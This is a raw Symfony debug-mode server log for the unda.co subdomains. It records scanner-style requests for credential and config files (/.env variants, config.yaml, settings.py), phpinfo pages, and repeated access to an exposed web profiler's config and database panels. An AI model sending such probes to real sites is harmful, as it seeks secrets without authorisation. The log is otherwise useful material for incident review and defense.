[2025-12-17 18:55:18] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"04e5af","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/04e5af","method":"GET"} []
[2025-12-17 18:55:18] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-17 18:55:46] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7300e2","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/7300e2?panel=twig","method":"GET"} []
[2025-12-17 18:55:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-17 18:57:01] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 18:57:07] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 18:57:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backend/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backend/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 18:57:12] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /admin/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /admin/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 18:57:15] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env.example"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env.example\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 18:57:19] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://35.175.10.94/app_dev.php/_profiler/phpinfo","method":"GET"} []
[2025-12-17 18:57:21] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/?phpinfo=-1","method":"GET"} []
[2025-12-17 18:57:22] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config.yaml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config.yaml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 18:57:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /env.example"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /env.example\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 18:57:28] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config.ini"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config.ini\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 18:57:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /settings.cfg"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /settings.cfg\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 18:57:40] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /staging2/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /staging2/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 18:57:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /robomongo.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /robomongo.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 18:57:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /settings.py"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /settings.py\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 18:57:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"00f518","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/00f518","method":"GET"} []
[2025-12-17 18:57:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-17 18:57:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /Admin/test"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /Admin/test\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 18:57:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v1/test"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v1/test\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 18:57:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /en/test"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /en/test\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 18:58:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /st/test"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /st/test\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 18:58:05] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /Crm"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /Crm\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 19:09:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b9ce7d","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b9ce7d?panel=config","method":"GET"} []
[2025-12-17 19:09:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-17 19:09:31] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"623c96","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/623c96?panel=request","method":"GET"} []
[2025-12-17 19:09:31] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-17 19:14:15] request.INFO: Matched route "_profiler_search". {"route":"_profiler_search","route_parameters":{"_controller":"web_profiler.controller.profiler:searchAction","_route":"_profiler_search"},"request_uri":"https://auth.unda.co/_profiler/search?limit=10","method":"GET"} []
[2025-12-17 19:14:18] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"1f08df","_route":"_profiler_search_results"},"request_uri":"https://auth.unda.co/_profiler/1f08df/search/results?limit=10","method":"GET"} []
[2025-12-17 19:14:18] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://auth.unda.co/_profiler/search_bar?limit=10","method":"GET"} []
[2025-12-17 19:18:12] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 19:19:49] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://www.unda.co/","method":"GET"} []
[2025-12-17 19:24:43] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"623c96","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/623c96?panel=config","method":"GET"} []
[2025-12-17 19:24:43] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-17 19:26:11] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 19:26:14] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
[2025-12-17 19:29:11] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b27c2a","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b27c2a?panel=db","method":"GET"} []
[2025-12-17 19:29:11] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
[2025-12-17 19:29:15] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://auth.unda.co/_profiler/open?file=vendor%2Fsymfony%2Fsymfony%2Fsrc%2FSymfony%2FBundle%2FWebProfilerBundle&line=0","method":"GET"} []
[2025-12-17 19:34:19] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-17 19:37:15] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"623c96","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/623c96?panel=cache","method":"GET"} []
[2025-12-17 19:37:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-17 19:37:59] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-17 19:39:09] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-17 19:41:20] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
[2025-12-17 19:41:20] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-17 19:41:20] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-17 19:41:20] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-17 19:41:20] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-17 19:41:20] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-17 19:41:20] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-17 19:41:20] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "HEAD /apps"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"HEAD /apps\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 19:41:21] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "HEAD /api/action"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"HEAD /api/action\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 19:41:21] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "HEAD /api/actions"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"HEAD /api/actions\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 19:41:21] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "HEAD /_next/data"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"HEAD /_next/data\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 19:41:21] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"POST"} []
[2025-12-17 19:41:21] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-17 19:41:21] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-17 19:41:21] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-17 19:41:21] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-17 19:41:21] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-17 19:41:21] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-17 19:43:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://auth.unda.co/_profiler/latest?panel=config","method":"GET"} []
[2025-12-17 19:43:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://auth.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-17 19:44:15] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://auth.unda.co/_profiler/open?file=vendor%2Fsymfony%2Fsymfony%2Fsrc%2FSymfony%2FBundle%2FFrameworkBundle&line=0","method":"GET"} []
[2025-12-17 19:44:44] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
[2025-12-17 19:44:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "HEAD /apps"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"HEAD /apps\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 19:44:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "HEAD /api/action"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"HEAD /api/action\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 19:44:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "HEAD /api/actions"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"HEAD /api/actions\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 19:44:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "HEAD /_next/data"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"HEAD /_next/data\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-17 19:44:45] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"POST"} []
[2025-12-17 19:46:09] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
[2025-12-17 19:46:09] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-17 19:46:09] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-17 19:46:09] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-17 19:46:09] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-17 19:46:09] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
